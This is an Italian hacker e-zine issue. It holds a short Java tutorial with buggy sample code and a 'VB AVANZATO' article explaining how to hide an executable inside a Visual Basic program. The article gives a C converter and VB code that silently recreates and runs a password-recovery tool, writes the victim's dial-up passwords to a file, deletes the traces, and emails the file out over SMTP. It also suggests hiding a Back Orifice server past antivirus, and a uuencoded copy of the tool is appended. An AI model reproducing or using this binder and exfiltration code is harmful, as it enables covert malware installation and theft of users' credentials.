sia al livello del kodice binario il ke signifika che i programmi java(sia applet che applicazioni) possono essere eseguiti su qualunque komputer sia installata una makkina java. Va be' cmq se avete capito (o almeno avete letto) li' sopra avete compreso qual'e' la differenza di java con gli altri linguaggi, cioe' la possibilita' di avere un programma compatibile sulla maggior parte dei sistemi (Pentium, powerPC, SPARC) Ekkovi uno schemino Metodo per compilare i programmi tradizionale / /COMPILATORE PENTIUM -------> File binario Pentium / CODICE SORGENTE------COMPILATORE POWERPC-----> Flie binario PowerPC \ \ \COMPILATORE SPARC ---------> File binario SPARC Metodo programmi Java CODICE SORGENTE-------->Compilatore Java------->Bytecode Java indipendente dalla piattaforma | | /-------|------\ / | \ / | \ Pentium PowerPC SPARC Ovviamente bisogna aver installati i Bytecode, cioe' speciali istruzioni di makkina che non sono specifike per un particolare processore o computer. Programmazione orientata ad oggetti La programmazione orientata ad oggetti e' modellata in base al fatto che, spesso, gli oggetti del mondo reale sono composti di oggetti piu' semplici di vario genere. Questa capacita' di combinare oggetti e' tuttavia solo un aspetto molto generale della programmazione orientata ad oggetti; numerosi altri concetti e caratteri stiche facilitano e rendono + flessibile la creazione e l'impiego di oggetti: le classi rappresentano il + importante di questi aspetti. Quando si scrivono programmi in un linguaggio orientato ad oggetti, non si definiscono in realta' degli oggetti, ma classi di oggetti, ovvero modelli per diversi oggetti con caratterisctiche simili. Una classe incorpora le caratterisctiche di una famiglia particolare di oggetti per esempio..... ALBERO | _________ |__________ / | \ / / \ \ / / \ \ / / \ \ / / \ \ PINO ABETE QUERCIA BETULLA \ Ecco...ALBERO fa da modello astratto che descriva le caratteristiche basilari per poter far parte di questa categoria mentre PINO ABETE QUERCIA sono istanze (oggetti) cioe' pur comportandosi come un albero si diversificano in base alle caratteristiche di ognuno (un abete e' diverso da un pino anche se sono entrabi alberi). ATTRIBUTI Gli attributi sono elementi che differenziano tra loro gli oggetti e ne determinano l'aspetto, lo stato e altre qualita'. Gli attributi sono definiti da variabili; tipi e nomi delle variabili sono deefiniti nella classe e ogni oggetto puo' avere valori particolari per esse.Poiche' i valori delle variabili possono variare da un'istanza all'altra, si parla di variabili istanza. Questa puo' essere imposta al momento della creazione dell'oggetto e rimanere immutata per tutta la vita di quest'ultimo, oppure essere modificata a piacere durante l'esecuzione del programma. Cambiando il valore della variabile, si modiFICAno ;) gli attributi dell'oggetto. CREAZIONE DI UNA CLASSE Adesso cominciamo a fare qualche cosa....... class Makkina { String marca String colore boolean statoMotore = false; } void avviaMotore() { if (statoMotore == true) System.out.println("Il motore e' gia' acceso."); else { statoMotore = true; System.out.println("Il motore e' stato acceso."); } void mostraAttr() { System.out.println("questa makkina e' una " + marca + " " + colore); if statoMotore == true System.out.println("Il motore ora e' acceso."); else System.out.println("Il motore ora e' spento."); } } public static void main (String args[]) { Makkina m= new Makkina(); m.marca = "Ferrari 350"; m.colore = "rossa"; System.out.println("Chiamo mostraAttr..."); m.mostraAttr(); Syetem.out.println("___"); System.out.println("Avvio il motore..."); m.avviaMotore(); System.out.println("___"); System.out.println("Chiamo mostraAttr..."); m.mostraAttr(); System.out.println("___"); System.out.println("Avvio il motore..."); m.avviaMotore(); } Compilate la classe........ La prima riga dikiara il metodo main() ...mmmm...forse di questo e' meglio parlare la volta prossima La riga 2, Makkina m = new Makkina(), genera una nuova istanza della classe Motocicletta e pone nella variabile m un riferimento a essa.Cmq solitamente, nei programmi java, non si opera direttamente sulle classi, ma si generano oggetti dalle classi e si richiamano i metodi degli oggetti. Le righe 5 e 6 richiamano il metodo mostraAttr(), definito nell'oggetto makkina (per la precisione la righa 6 richiama il metodo, mentre la righa 5 stampa l'avviso che si sta' per richiamare il metodo). Il nuovo oggetto makkina stampa i valori delle sue variabili istanza(marca, colore, impostate nelle righe precedenti) e comunicache il motore e' spento. La righa 7 stampa una linea di separazione sullo schermo, a fini puramente estetici. LA righa 9 richiama il metodo avviaMotore() dell'oggetto makkina, per avviare il motore. Il motore e' ora acceso. La righa 12 stampa nuovamente i valori delle variabili istanza. Ora il motorerisulta acceso. La righa 15 tenta di accendere di nuovo il motore; poiche' questo e' gia' acceso, viene stampato il messaggio: "Il motore e' gia' acceso". Okki, per questa 1°(e scarsa) uscita ho finito bbbbbbbbbyyyyyyyyeeeeeeeeee!!!!!!!! ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ INTERVALLO by N0bodY88 Scrivo queste poke righe solo x dirvi di prepararvi mentalmente al contenuto dei prossimi articoli sulla programmazione postati dal mitico Master, anke se ankora adesso non ci credo che abbia scritto x noi! Adesso vi lascio a questa lettura, sperando che dopo tutti questi tutorial e tutti questi art. di Master vi venga almeno una minima idea di comincirae a programmare :))) N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ VB AVANZATO ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Sistema per includere in un unico PE generato da visual basic piu' programmi. Vi hanno detto che non e' possibile. In effetti e' vero, per farlo bisogna ricorrere ad un trucco abbastanza semplice anche se un po' laborioso. Cosa e' possibile fare, con questo sistema, per un utente malizioso? es: 1. Unire ad un programma proprio un altro da far partire in maniera invisibile 2. Collegare due programmi tra loro tipo il silkerope. 3. Iglobare in un compilato vb un altro programma qualunque (proveniente cioe' da un qualunque altro compilatore) rendendolo oltretutto assolutamente invisibile ad ogni controllo. (anche il server di una backdoor quindi.) La tecnica e' semplice. Praticamente bisogna fare una procedura primaria che converta il programma da inglobare in una immagine binaria da inserire nel nostro sorgente. Facciamo un caso semplice: il programma prova.exe inglobato in un sorgente vb. contenente solo tre byte ( ABC ) deve essere si convertono tutti i byte di prova.exe nel loro equivalente decimale e si inseriscono formattati a tre cifre decimali in una variabile stringa: A=065, B=066, C=067 quindi C(1)="065066067" il passo successivo sara' una procedura che reimpostera' il programma originale: ' Il programma originale prova.exe Dim C(1) as String C(1)="065066067" ' Il programma reimpostato Open "prova.exe" for Output as #1 for n=1 to 3 Print #1, Chr$(Mid$(c(1), (n - 1) * 3 + 1, 3)); Next n Close #1 un successivo passo tipo alfa=Shell("prova.exe",0) ... Kill("prova.exe") potrebbe provvedere all'esecuzione invisibile all'eliminazione successiva del programma -ricreato- al fine di non lasciare orme rintracciabili. problemi e limitazioni: Il vb 5 essendo full 32b gestisce i programmi a 16b o dos con meno disinvoltura rispetto alle versioni precedenti percui per non avere problemi di conflitto spesso e' meglio compilarsi questo tipo di programmi col visual basic 4.. cio' non toglie che anche il 5 nel 99.9% dei casi faccia egregiamente il suo lavoro. Ogni programma cosi' inglobato e' rappresentato da una immagine di se che solitamente e' dalle 3 alle quattro volte superiore come dimensioni rispetto a quelle originali. DialupPassword passa -trasformato- da 16k a circa 56k. .. finita la teoria, la pratica. Un esempio 'reale' di cio' che e' possibile fare. Mettiamo di avere il sorgente di un nostro programma "A" al quale vogliamo unire un tool gia' preconfezionato per il recupero delle passowrd di connessione e successivamente provvedere all'invio di queste ultime ad un indirizzo email a noi noto. (Il tool per recuperare le passowrd di connessione si chiama dialupPassword e lo trovate codificato uuencode alla fine di questo articolo) Serve come prima cosa un programma che ci converta il file dialuppassword nella sua immagine binaria. Allora rinominiamo DialupPassword.exe come p.exe (meglio usare nomi poco didascalici) Serve a questo punto un tool di conversione, questo l'ho fatto in C per ovviare ad un evidente problema di velocita', in visual basic impiegava una vita per convertire file di una certa dimensione. (cmq lo trovate anche questo gia compilato e unito in fondo all'articolo come VBC.exe.) Ho chiamato questo semplice ma efficacissimo tool VBC (visual basic converter) funziona cosi: avendo un file PIPPO.exe da convertire lo si passa al VBC con questa sintassi VBC pippo.exe il converter creera' una immagine binaria del file pippo.exe chiamandola pippo.ex_ Il sorgente del programma VBC per chi volesse ricompilarselo da se e' questo: ------------------------------------------------------------#include <stdio.h> #include <string.h> #define MAX_RIGA=20 void main(n,file) int n; char *file[]; { char *p,*w; FILE *CREA_FILE, *CONVERTI; long k=0,i=0,f=0; CONVERTI=fopen(file[1],"rb"); p=file[1]; p[strlen(p)-1]='_'; CREA_FILE=fopen(p,"wb"); fprintf(CREA_FILE,"C(%ld)=\"",k); k++; while(!feof(CONVERTI)) { w=fgetc(CONVERTI); if(w>=100) fprintf(CREA_FILE,"%d",w); else if(w>=10&&w<=99) fprintf(CREA_FILE,"0%d",w); else if(w>=0&&w<=9) fprintf(CREA_FILE,"00%d",w); i++;f=1; if(i>=MAX_RIGA) { fprintf(CREA_FILE,"\"%c%cC(%ld)=\"",13,10,k); k++;i=0;f=0; } } if(f==1)fprintf(CREA_FILE,"\"%c%c",13,10); fclose(CONVERTI); fclose(CREA_FILE); } ------------------------------------------------------------VBC p.exe creera' allora il file p.ex_ il quale contiene queste righe: C(0)="077090080000002000000000004000015000255255000000184000000000" C(1)="000000000000064000026000000000000000000000000000000000000000" C(2)="000000000000000000000000000000000000000000000000000000000000" C(3)="000001000000186016000014031180009205033184001076205033144144" C(4)="084104105115032112114111103114097109032109117115116032098101" C(5)="032114117110032117110100101114032087105110051050013010036055" ..... C(786)="000000000000000000000000000000000000000000000000000000000000" C(787)="000000000000000000000000000000000000000000000000000000000000" C(788)="000000000000000000000000000000000000000000000000000000000000" C(789)="000000000000000000000000000000000000000000000000000000000000" C(790)="000000000000000000000000000000000000000000000000000000000000" C(791)="000000000000000000000000000000000000000000000000000000000000" C(792)="000000000000000000000000000000000000000000000000000000000000" C(793)="000000000000000000000000000000000000" Queste sono le definizioni del vettore stringa C() da inserire con copia e incolla nel nostro sorgente VB. Creeremo quindi una procedura cosi': ------------------------------------------------------------------Private Sub Command1_Click() ' Vettore stringa C dimensionato relativamente al numero di stringhe ' generate da VBC Dim c(793) As String ' Copia e incolla da p.ex_ C(0)="077090080000002000000000004000015000255255000000184000000000" C(1)="000000000000064000026000000000000000000000000000000000000000" C(2)="000000000000000000000000000000000000000000000000000000000000" C(3)="000001000000186016000014031180009205033184001076205033144144" C(4)="084104105115032112114111103114097109032109117115116032098101" C(5)="032114117110032117110100101114032087105110051050013010036055" ..... C(786)="000000000000000000000000000000000000000000000000000000000000" C(787)="000000000000000000000000000000000000000000000000000000000000" C(788)="000000000000000000000000000000000000000000000000000000000000" C(789)="000000000000000000000000000000000000000000000000000000000000" C(790)="000000000000000000000000000000000000000000000000000000000000" C(791)="000000000000000000000000000000000000000000000000000000000000" C(792)="000000000000000000000000000000000000000000000000000000000000" C(793)="000000000000000000000000000000000000" 'ESEMPIO DI UTILIZZO 'RIGENERA IL FILE PER IL RECUPERO DELLE PASSWORD Open "prova.exe" For Output As #1 For n = 0 To 793 For i = 1 To Len(c(n)) / 3 Print #1, Chr$(Mid$(c(n), (i - 1) * 3 + 1, 3)); Next i Next n Close #1 ' CREA UN FILE BATCH PER l'ESECUZIONE CON PARAMETRI DEL PROGRAMMA ' RIGENERATO, LO ESEGUE E CREA UN FILE PASS.TXT CONTENENTE TUTTE ' LE PASSWORD DI CONNESSIONE (IN CHIARO) SALVATE PRECEDENTEMENTE Open "vai.bat" For Output As #1 Print #1, "prova > pass.txt" Print #1, "del prova.exe" Print #1, "" Close #1 alfa = Shell("vai.bat", 0) End Sub ------------------------------------------------------------------RUN.. e nella dir dentro la quale si e' compilato il programma sopra ci troveremo un file di testo chimato. PASS.txt contenente le password di connessione. Il programma DialupPassword ha eseguito il suo lavoro restando pero' completamente mistificato all'interno di un unico e 'rassicurante' file VB. emh.. giusto per chi fosse curioso, il server di backorifice compattato con wwpack32 e passato al VBC diventa circa 250k .. sarebbero da considerare quindi nel proprio programma visual basic 300/350k in piu' rispetto al normale dimensionamento, anche se ovviamente il fatto di avere un server pronto a partire attaccato assieme al proprio tool e completamente invisibile a TUTTI gli antivirus potrebbe richiamare dei notevoli vantaggi.. anche in relazione al fatto che il piu' agile Silkerope e' abbastanza malvisto dai vari antivirus che dichiarano i suoi prodotti come programmi sospetti. Finito. ;-) .. ah gia... manca la parte piu' interessante: come spedire il file pass.txt ad un indirizzo email. Si potrebbe usare uno dei tanti programmi freeware che si trovano in rete ed eseguirli con shell. Si potrebbe usare un ocx apposito tipo SMTP.OCX. Il sistema che vi mostro e' decisamente piu' sempice ed oltretutto spiega un metodo generale col quale e' possibile inviare dati via http, ftp, smtp, pop, sock, ecc.. Richiede solamente l'utilizzo del WInsock.. l'ocx col quale in effetti e' possibile fare veramente di TUTTO. Spedire una mail col winsock e' una procedura analoga a quella usata con telnet. Cosa occorre: Soltanto due cose: 1. un server SMTP possibilmente col relay .. altimenti la vostra mail non arrivera' mai. (La cosa migliore sarebbe usare il server smtp del tizio che -usera'- il programma.. ..lui sicuramente il relay sul suo server smtp ce l'ha! ;-) 2. Queste istruzioni da inserire in una procedura Visual basic dopo aver attivato e trascinato sul form principale il controllo winsock: (Vanno bene in pratica sia il MS-winsock che il Winsock degli intranet activeX.) ' Passo 1.. collegarsi al server smtp: ' Per dare il tempo ai dati di arrivare.. ' occorre dopo ogni comando aspettare n secondi ' la procedura delay(n) blocca l'esecuzione ' per il tempo necessario appunto. Private Sub delay(n) S = Timer:Do While Timer<S+n:DoEvents:Loop End Sub ' Ci si connette al server mail (come con telnet) winsock.Connect "mail.cuccurullo.it", 25 delay (6) ' Si manda il comando HELO(necessario) Data = "HELO ciao" & vbCrLf winsock.SendData Data delay (6) ' Si manda il comando MAIL FROM: Data = "MAIL FROM: [email protected]" & vbCrLf winsock.SendData Data delay (6) ' Si manda il comando RCPT TO: Data = "RCPT TO: [email protected]" & vbCrLf winsock.SendData Data delay (6) ' Si manda il comando DATA Data = "DATA" & vbCrLf winsock.SendData Data delay (6) ' Corpo dell'articolo ' Io ho ipotizzato un articolo a Subject: -Prova- contenente ' nel BODY la sola parola -Arrivato- ma nulla vieta di ' caricare nel data il testo del file pass.txt prima creato. ;-) Data = "Subject:prova" + vbCrLf + vbCrLf + "Arrivato" & vbCrLf winsock.SendData Data delay (6) ' Comando di conferma spedizione per il sendmail Data = "." & vbCrLf winsock.SendData Data delay (6) winsock.Close In breve la procedura senza tanti help e' questa: ------------------------------------------------------------------- Private Sub Command1_Click() winsock.Connect "mail.cuccurullo.it", 25:delay (6) Data = "HELO ciao" & vbCrLf winsock.SendData Data delay (6) Data = "MAIL FROM: [email protected]" & vbCrLf winsock.SendData Data delay (6) Data = "RCPT TO: [email protected]" & vbCrLf winsock.SendData Data delay (6) Data = "DATA" & vbCrLf winsock.SendData Data delay (6) Data = "Subject:prova" + vbCrLf + vbCrLf + "Arrivata" & vbCrLf winsock.SendData Data delay (6) Data = "." & vbCrLf winsock.SendData Data delay (6) winsock.Close End Sub Private Sub delay(n) S = Timer:Do While Timer<S+n:DoEvents:Loop End Sub ------------------------------------------------------------------E'uguale a telnet in linea di principio ...o no!? ;-) Ed ovviamente con lo stesso sistema nessuno vieta di fare un progr per mandare aricoli ad un ng via nntp, recuperare pagine da http o altro. Questo infatti e' a tutti gli effetti un sistema per poter usufruire di un clone virtuale di telnet all'interno di un programma VB. Considerato che il winsock.ocx e' una libreria normalmente registrata da tutti gli utenti e che le procedure sopra riportate non richiedono particolari versioni del medesimo.. non mi resta altro che augurarvi .. buon lavoro. ;-) Master-Hacker ------------------------ SEZIONE SUPPORTI begin 644 DialupPassword.exe M35I0``(````$``\`__\``+@`````````0``:```````````````````````` M``````````````````````$``+H0``X?M`G-(;@!3,TAD)!4:&ES('!R;V=R M86T@;75S="!B92!R=6X@=6YD97(@5VEN,S(-"B0W```````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````````````````````````````````%!%``!,`0@`&5Y"*@`` M````````X`".@0L!`AD`*@```!````````!P.0```!````!``````$```!`` M```"```!``````````0``````````+`````$`````````P``````$```0``` M```0```0````````$````````````````&```(@$````H``````````````` M````````````````D```$`,```````````````````````````````````"` M```8```````````````````````````````````````````````````````` M````````````0T]$10````"4*0```!`````J````!``````````````````` M(```8$1!5$$`````J`````!``````@```"X``````````````````$```,!" M4U,``````+D$````4``````````P``````````````````````#`+FED871A M``"(!````&`````&````,```````````````````0```P"YT;',`````"``` M``!P`````````#8``````````````````````,`N<F1A=&$``!@`````@``` M``(````V``````````````````!```!0+G)E;&]C```0`P```)`````$```` M.```````````````````0```4"YR<W)C``````````"@`````@```#P````` M`````````````$```%``````````````````L``````````^```````````` M``````!```!0```````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M```````````````````````````````````````````````````````````` M`````````````````````````````````````````````/\E!&%``(O`_R4` M84``B\#_)?Q@0`"+P/\E^&!``(O`_R7T8$``B\#_)?!@0`"+P/\E[&!``(O` M_R7H8$``B\#_)>1@0`"+P/\EX&!``(O`_R7<8$``B\#_)=A@0`"+P/\E$&%` M`(O`_R748$``B\#_)=!@0`"+P/\ES&!``(O`_R7(8$``B\#_)<1@0`"+P/\E MP&!``(O`_R6\8$``B\#_);A@0`"+P/\EM&!``(O`_R6P8$``B\#_)2!A0`"+ MP/\E'&%``(O`_R4884``B\#_):Q@0`"+P/\E*&%``(O`4X/$O+L*````5.BA M____]D0D+`%T!0^W7"0PB\.#Q$1;PXO`_R6H8$``B\#_):1@0`"+P/\EH&!` M`(O`_R6<8$``B\#_)9A@0`"+P/\EE&!``(O`_R608$``B\#_)8Q@0`"+P%-6 MOAQ40`"#/@!U.FA$!@``:@#HJ/___XO(A<EU!3/`7EO#H1A40`")`8D-&%1` M`#/2B\(#P(U$P02+'HD8B09"@_ID=>R+!HL0B19>6\.0B0")0`3#B\!35HOR MB]CHG?___X7`=04SP%Y;PXL6B5`(BU8$B5`,BQ.)$(E8!(E"!(D#L`%>6\.+ M4`2+"(D*B5$$BQ4<5$``B1"C'%1``,-35E=548OQB10DB^B+70"+!"2+$(D6 MBU`$B58$BSN+0PB+T`-3##L6=12+P^BW____BT,(B0:+0PP!1@3K%HL6`U8$ M.\)U#8O#Z)K___^+0PP!1@2+WSOK=<*+UHO%Z%7___^$P'4$,\")!EI=7UY; MPXU``%-65U6#Q/B+V(O[BS*+0P@[\')LB\X#2@2+Z`-K##O-=UX[\'4;BT($ M`4,(BT($*4,,@WL,`'5$B\/H-?___^L[BPJ+<@0#SHOX`WL,.\]U!2ES#.LF MBPH#2@2)#"0K^8E\)`2+$BO0B5,,B]2+P^C0_O__A,!U!#/`ZPRP`>L(BQL[ M^W6%,\!96EU?7EO#D%-65XO:B_"!_@``$`!]![X``!``ZPR!QO__``"!Y@`` M__^)<P1J`6@`(```5FH`Z/C]__^+^(D[A?]T(XO3N"!40`#H;/[__X3`=1-H M`(```&H`BP-0Z-G]__\SP(D#7UY;PY!35E=5B]F+\HOHQT,$```0`&H$:``@ M``!H```0`%7HI?W__XOXB3N%_W4?@<;__P``@>8``/__B7,$:@1H`"```%95 MZ(#]__^)`X,[`'0CB].X(%1``.CU_?__A,!U$V@`@```:@"+`U#H8OW__S/` MB0-=7UY;PY!35E=5@\3LB4PD!(D4),=$)`C_____,]*)5"0,B^B+!"0#Q8E$ M)!"+'2!40`#K48L[BW,(.^YW1HO&`T,,.T0D$'<[.W0D"',$B70D"(O&`T,, M.T0D#'8$B40D#&@`@```:@!6Z._\__^%P'4*QP7\4T```0```(O#Z(K]__^+ MWX'[(%1``'6GBT0D!#/2B1"#?"0,`'09BT0D!(M4)`B)$(M$)`PK1"0(BU0D M!(E"!(/$%%U?7EO#4U9758/$](E,)`2)%"2+T(OJ@>4`\/__`Q0D@<+_#P`` M@>(`\/__B50D"(M$)`2)*(M$)`@KQ8M4)`2)0@2+-2!40`#K/(M>"(M^#`/[ M.^MV`HO=.WPD"'8$BWPD"#O[=AYJ!&@`$```*_M74^@F_/__A<!U"HM$)`0S MTHD0ZPJ+-H'^(%1``'6\@\0,75]>6\.+P%-65U51B]B+\X'&_P\``('F`/#_ M_XDT)(OK`^J!Y0#P__^+!"2)`8O%*P0DB4$$BS4@5$``ZSB+7@B+?@P#^SL< M)',#BQPD.^]S`HO]._MV'&@`0```*_M74^BM^___A<!U"L<%_%-```(```"+ M-H'^(%1``'7`6EU?7EO#C4``4U9758/$^(ORB_B],%1``(''_S\``('G`,#_ M_XM=`.LS.WL,?RR+SHO7BT,(Z+K^__^#/@!T4(M&!`%#"(M&!"E##(-[#`!U M/HO#Z.S[___K-8L;.]UUR8O6B\?H]_S__X,^`'0AB\R+UHO%Z./[__^#/"0` M=:6+S(M6!(L&Z+']__\SP(D&65I=7UY;PXO`4U9758/$[(D,)(OZB_"],%1` M`(''_S\``('G`,#__XM=`.L"BQL[W70%.W,(=?4[<PAU5SM[#`^.E@```(U, M)`2+URM3#(M#"`-##.C;_/__@WPD!`!T,XU,)`R-5"0$B\7H7?O__X-\)`P` M=;&-3"0,BU0D"(M$)`3H)?W__XL$)#/2B1#ID````(U,)`2+UXO&Z)3\__^# M?"0$`'0TC4PD#(U4)`2+Q>@6^___@WPD#``/A6;___^-3"0,BU0D"(M$)`3H MVOS__XL$)#/2B1#K2(MK"#OU=3H[>PQ_-8L,)(O7B\7H<?W__XL$)(,X`'0H MBP0DBT`$`4,(BP0DBT`$*4,,@WL,`'40B\/HFOK__^L'BP0D,]*)$(/$%%U? M7EO#D%-65X/$[(OYB10DC9C_/P``@>,`P/__BS0D`_"!Y@#`__\[WG-;B\^+ MUBO3B\/HF?W__XU,)`2+U[@P5$``Z%WZ__^+7"0$A=MT'XU,)`R+5"0(B\/H M)OS__XM$)`R)1"0$BT0D$(E$)`B#?"0$`'04C50D!+@P5$``Z)7Z___K!#/` MB0>#Q!1?7EO#58OL,])5:(880`!D_S)DB2)H`%1``.@Y^?__@#TM4$```'0* M:`!40`#H+OG__[@@5$``Z(SY__^X,%1``.B"^?__N%Q40`#H>/G__VCX#P`` M:@#HW/C__Z-85$``@SU85$```'0ON`,```"+%5A40``SR8E,@O1`/0$$``!U M[+A`5$``B4`$B0"C3%1``,8%^%-```$SP%I9662)$&B-&$``@#TM4$```'0* M:`!40`#HK_C__\/I30\``.OEH/A30`!=PU6+[%.`/?A30```#X3.````,])5 M:&P90`!D_S)DB2*`/2U00```=`IH`%1``.AF^/__Q@7X4T```*%85$``4.@T M^/__,\"C6%1``(L=(%1``.L2:`"```!J`(M#"%#H)?C__XL;@?L@5$``=>:X M(%1``.B)^/__N#!40`#H?_C__[A<5$``Z'7X__^A&%1``(7`=!>+$(D5&%1` M`%#HUO?__Z$85$``A<!UZ62/!0````"#Q`AH<QE``(`]+5!```!T"F@`5$`` MZ-/W__]H`%1``.C1]___P^EG#@``Z]M;7<.+P%,[!4Q40`!U"8M0!(D53%1` M`(M0!(M("('Y`!```'\J.\)U$,'I`J%85$``,]*)5(CTZQW!Z0*+'5A40`") M5(OTBP")`HE0!%O#BP")`HE0!%O#D(L57%1``.L0BTH(.\%R!P-*##O!<A:+ M$H'Z7%1``'7HQP7\4T```P```#/2B\+#D%.+RH/I!(T<`8/Z$'P/QP,'``"` MB]'HH0$``%O#@_H$?`R+RH')`@``@(D(B0M;P_\%[%-``(O0@^H$BQ*!XOS_ M_W^#Z@0!%?!30`#HQP4``,.+P(/Z#'P.@\H"B1"#P`3HRO___\.#^@1\"HO* M@<D"``"`B0@#PH,@_L-35HO0@^H$BQ*+RH'A`@``@('Y`@``@'0*QP7\4T`` M!````(O:@>/\__]_*\.+R#,1]\+^____=`K'!?Q30``%````]@$!=""+T(/J M#(MR""O&.W`(=`K'!?Q30``&````Z)K^__\#WHO#7EO#C4``4U97B]@S_XL# MJ0```(!T"R7\__]_`_@#V(L#J`)U$XOSB\;H:/[__XM&"`/X`]B#(_Z+QU]> M6\-35E=5@\3XB_J+\(O&Z)K^__^+V(MK"(O%`T,,B]"-##<KT8/Z#'\$B_@K M_HO&*\6#^`Q]$HO,B]8K4P@#UXO%Z-_[___K#XO,B]>#Z@2-1@3HSOO__XLL M)(7M=00SP.LPB]4KUHO&Z'#^__^+Q0-$)`2+4P@#4PP[PG,*C10W*]#HJO[_ M_XO4B\/HJ?;__[`!65I=7UY;PU-65XORB_B+WXES"(O#`\:#Z`R)<`B!_@`0 M``!_,(O6P>H"H5A40`"+1)#TA<!U$*%85$``B5R0](E;!(D;ZSJ+$(E#!(D3 MB1B)6@3K+('^`#P``'P-B]:+Q^@)____A,!U%Z%,5$``B1U,5$``BQ")0P2) M$XD8B5H$7UY;PXO`@SU05$```'Y`@SU05$``#'T,QP7\4T``!P```.LKH5!4 M0`"#R`*+%5140`")`J%45$``@\`$Z+G]__\SP*-45$``,\"C4%1``,.+P%-6 M5X/$\(OPC3PDI:6+_.B@____C4PD"(O7N%Q40`#H//7__XM<)`B%VW4$,\#K M4HL'.]AS"NBY_?__*0<!1P2+!P-'!(OS`W0D##O&<PCH$/[__P%'!(L'`T<$ M._!U$8/H!+H$````Z`O]__^#;P0$BP>C5%1``(M'!*-05$``L`&#Q!!?7EO# MC4``4X/$^(O8B]2-0P3H</C__X,\)`!T"XO$Z%?___^$P'4$,\#K`K`!65I; MPY!35H/$^(ORB]B+S(U6!(O#Z,_X__^#/"0`=`N+Q.@F____A,!U!#/`ZP*P M`5E:7EO#C4``,]+!Z`(]``0``'<6BQ585$``BU2"](72=0A`/0$$``!UZHO" MPXU``%-65U6+\+],5$``O5!40`"+'4140``[<P@/CH0```"+'XM#"#OP?GN) M<PB+6P0[<PA_^(L7B4((.Q]T!(D?ZV.!_@`0``!_#8O&Z(G___^+V(7;=4Z+ MQN@<____A,!U!S/`Z8@````[=0!_I"EU`(-]``Q]"`-U`#/`B44`H5140``! M-5140`"+UH/*`HD0@\`$_P7L4T``@^X$`37P4T``ZTR+P^@V^___BU,(B\(K MQH/X#'P,B],#UI+H8/W__^L2B_(['W4%BT,$B0>+PP/&@R#^B\.+UH/*`HD0 M@\`$_P7L4T``@^X$`37P4T``75]>6\-5B^R#Q/A35E>+V(`]^%-```!U$^@K M^?__A,!U"C/`B47\Z50!```SR55H`"!``&3_,62)(8`]+5!```!T"F@`5$`` MZ%CR__^#PP>#X_R#^PQ]!;L,````@?L`$```#X^3````B\.%P'D#@\`#P?@" MBQ585$``BU2"](72='F+\HO&`\.#(/Z+0@0[T'4:B\.%P'D#@\`#P?@"BPU8 M5$``,_^)?('TZR:+RX7)>0.#P0/!^0*+/5A40`")1(_TBPJ)3?B+3?B)002+ M3?B)"(O&BU((@\H"B1"#P`2)1?S_!>Q30`"#ZP0!'?!30`#H%@D``.F$```` M.QU05$``?THI'5!40`"#/5!40``,?0T#'5!40``SP*-05$``H5140``!'514 M0`"+TX/*`HD0@\`$B47\_P7L4T``@^L$`1WP4T``Z,$(``#K,HO#Z+S]__^) M1?PSP%I9662)$&@'($``@#TM4$```'0*:`!40`#H-?'__\/ITP<``.OEBT7\ M7UY;65E=PXU``%6+[%%35E>+V#/`H_Q30`"`/?A30```=1_HGO?__X3`=1;' M!?Q30``(````QT7\"````.EA`0``,\E5:*8A0`!D_S%DB2&`/2U00```=`IH M`%1``.B_\/__B_.#[@2+'O;#`G4/QP7\4T``"0```.GU````_PWL4T``B\,E M_/__?X/H!"D%\%-``/;#`71%B\:#Z`R+4`B#^@Q\"/?"`P``@'0/QP7\4T`` M"@```.FV````B\8KPCM0"'0/QP7\4T``"@```.F>`````]J+\.B0^/__@>/\ M__]_B\8#PXOX.SU45$``=2PI'5140``!'5!40`"!/5!40```/```?@7H'_O_ M_S/`B47\Z'$'``#IA0```(L0]L("=!R!XOS__W^#^@1]#,<%_%-```L```#K M-X,(`>LIB\>#>`0`=`N#.`!T!H-X"`Q]#,<%_%-```L```#K$XM0"`/:Z`3X M__^+TXO&Z#OZ__^A_%-``(E%_#/`6EE99(D0:*TA0`"`/2U00```=`IH`%1` M`.B/[___P^DM!@``Z^6+1?Q?7EM97<.+P%-65U6#Q/B+\H/&!X/F_(/^#'T% MO@P```"+Z(/M!(M]`('G_/__?XO%`\>+V#O^#X*#````B]<KUHD4)#L=5%1` M`'4XBP0D*0545$``BP0D`0505$``@SU05$``#`^-3`$``(L$)`$%5%1``(L$ M)"D%4%1``(OWZ3,!``"+V/8#`G4-B\.+4`@!%"3H,/?__X,\)`Q\&XO=`]Z+ M!"2#R`*)`XO#@\`$Z,CW___I_@```(OWZ?<```"+QBO'B40D!#L=5%1``'5G MH5!40``[1"0$?%.+1"0$*0505$``BT0D!`$%5%1``(,]4%1```Q]&*%05$`` M`0545$```S505$``,\"C4%1``(O&*\<!!?!30`"+10`E`P``@`OPB74`L`'I MH@```.A5^?__B]T#W_8#`G5-B].+PHM("(D,)(L,)#M,)`1S#@,4)(O:BP0D M*40D!.LLZ&;V__^+1"0$*00D@SPD#'P.B\4#QHL4).B-^/__ZSH#-"2+W0/> 